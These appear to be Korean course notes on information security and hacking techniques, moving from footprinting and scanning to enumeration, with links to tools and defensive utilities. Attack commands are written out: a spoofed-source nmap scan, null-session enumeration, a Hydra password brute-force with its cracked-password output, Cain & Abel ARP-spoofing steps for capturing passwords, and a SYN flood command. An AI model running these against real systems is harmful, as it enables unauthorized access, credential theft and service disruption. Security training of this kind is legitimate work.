Module 1 - Information Security Overview
- 학술적인 정의의 정보보안은 각종 위협으로부터 안전하게 보호하여 정보 시스템의 "기밀성", "무결성", "가용성"을 보장하는 것을 말한다.
- Hacker 는 system 과 network 분야의 H/W, S/W 전문가를 지칭하는 의미로 고도의 전문 프로그래밍 실력을 가지고 합법적인 system, network 관리를 하는 사람을 의미합니다.
- 전설적인 해커 Kevin Mitnick : 이론만으로 존재했던 IP Spoofing 공격을 실제로 공격에 사용한 최초의 해커로서 그의 실력을 입증하였다.
- 해커의 분류 : Elite, Semi Elite, Developed Kiddie, Script Kiddie, 레이머
- 보안 10대 불변 법칙
유용한 사이트
- http://packetstorm.linuxsecurity.com - 익스플로잇
- http://www.krcert.or.kr - 통계분석 메뉴
- http://www.hackerwatch.org - 전세계 인터넷 트래픽 맵
- http://www.zone-h.org - 메인페이지가 변조된 사이트들을 실시간으로 알려줌
- http://www.hackersnews.org - 메인페이지가 변조된 사이트들을 실시간으로 알려줌
Module 2 - Attack Technique
- 전통적인 공격기법
-
1단계 : 정보수집 -> 전체단계중 90% 이상을 차지한다.
- 2단계 : 시스템 침입
- 3단계 : 공격 전이
- 공격기법 세분화
- Footprinting
- Scanning
- Enumeration
- Gaining Access
- Escalating Privilege
- Pilfering
- Covering Tracks
- Backdoor
- Denial of Service
Ping을 실행했을때, TTL 값이 128 근처이면 윈도우 운영체제이고 유닉스 계열 운영체제는 64 나 255 가 된다.
Module 3 - Footprinting
-
Social Engineering
- 가장 쉬우면서도 가장 확실한 방법일 수 있는 것이 바로 이 사회공학 기법이다. 희대의 해커였던 케빈 미트닉은 기술 또한 우수했지만 이 사회공학 기법에 있어서 타의 추종을 불허한다고 한다.
- 합법적인 사용자가 들어가는 데 바로 뒤에 붙어서 들어가려고 시도 (Piggybacking)
- 휴지통 뒤지기
- whois
whois는 인터넷에 등록된 domain에 대한 정보를 제공해주는 서비스이다. 이 서비스를 통해 master/slave name server 의 IP, 관리자의 전화번호를 비롯하여 email address, 기관의 지리적 위치, 할당 받은 IP Address, 최종 업데이트일자 등을 확인할 수 있다.
http://www.archive.org
http://www.ip-adress.com
Module 4 - Scanning
http://www.iana.org
http://insecure.org - NMAP (스캐닝)
http://www.wireshark.org - WireShark (패킷캡쳐), AirPcap - 아주 강력한 무선 해킹 툴
출발지 주소를 속이면서(IP Spoof) 해당 호스트 스캐닝 하기
- # nmap -v -sS -S 100.100.100.100 -e eth0 192.168.234.129
http://www.foundstone.com - Attacker
Portsentry (iptables 방화벽 연동)
step 1 : http://www.rpmfind.net --> portsentry 검색어 입력 검색
step 2 : wget ~~~
step 3 : rpm -Uvh portsentry ~~
step 4 : lokkit (방화벽활성화)
step 5 : iptables -F (기존 방화벽 rule 제거)
step 6 : service portsentry start
step 7 : 윈2000 에서 리눅스 스캔 (차단당하는지 확인)
Module 5 - Enumeration
윈도우즈 해킹을 위한 준비(스캐닝)
http://securityfocus.com/archive/
http://www.securiteam.com
http://sectools.org - Top 100 Network Security Tools
http://www.milw0rm.com
http://www.hackeroo.com
http://www.nessus.org - 가장 강력한 취약점분석 도구
Nikto - Web Server Scanner
http://www.securiteam.com --> search 에서 nikto 로 검색
http://www.cirt.net/code/nikto.shtml
http://www.watchfire.com/ --> AppScan 상용 웹스캐너
MD5SUM for Windows
http://www.pc-tools.net/win32/md5sums
Null Session 를 이용한 정보수집 방법
- c:> net use \\아이피주소\IPC$ "" /u:""
- c:> winfo 아이피주소 -v
- c:> userinfo \\아이피주소 Administrator
Hydra 를 이용하여 Administrator 비밀번호 알아내기
http://packetstorm.linuxsecurity.com/ 에서 Search 에 hydra 입력
hydra 다운로드
tar xvfz hydra-5.4-src.tar.gz
http://packetstorm.linuxsecurity.com/Crackers/wordlists/에서 passlist 다운로드
# cd hydra-5.4-src
# ./configure && make && make install
# ./hydra -l administrator -P /root/passlist 192.168.234.129 smtp-auth
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-12-18 16:20:17
[DATA] 16 tasks, 1 servers, 5248 login tries (l:1/p:5248), ~328 tries per task
[DATA] attacking service smtp-auth on port 25
[25][smtpauth] host: 192.168.234.129 login: administrator password: 12345
[STATUS] attack finished for 192.168.234.129 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2007-12-18 16:20:21
http://www.adventnet.com --> 공짜 로그서버 제공 (5개 서버까지 등록 가능) --> EventLog Analyzer 4
tripwire 설치
- # yum -y install tripwire
-
# tripwire-setup-keyfiles
# tripwire --init
-
# tripwire --check
Unix 용 루트킷 검색 프로그램
http://www.chkrootkit.org --> chkrootkit
http://www.rootkit.nl --> rkhunter
Windows 용 루트킷 검색 프로그램
http://technet.microsoft.com --> sysinternals --> Securiy Utilities --> RootkitRevealer, Process Explorer
Sniffing Program
http://www.oxid.it/cain.html
카인과아벨를 이용한 스니핑 방법
Sniffer 탭 클릭 --> Configure 메뉴 --> 랜카드 선택, ARP 탭:가짜 IP, MAC 입력(59.28.225.180) --> Start Sniffer and Start ARP (두번째, 세번째 아이콘 클릭) --> 플러스 아이콘 클릭 --> All --> 모든 IP MAC 이 다 보이게 됨. --> 밑에 ARP 탭 선택 --> 플러스 아이콘 클릭 --> 스니핑하고자 하는 IP 선택 --> 스니핑 시작 --> Password 탭 선택하면 비밀번호가 보임
SYN Flooding Attack
syn 192.168.x.x -p 80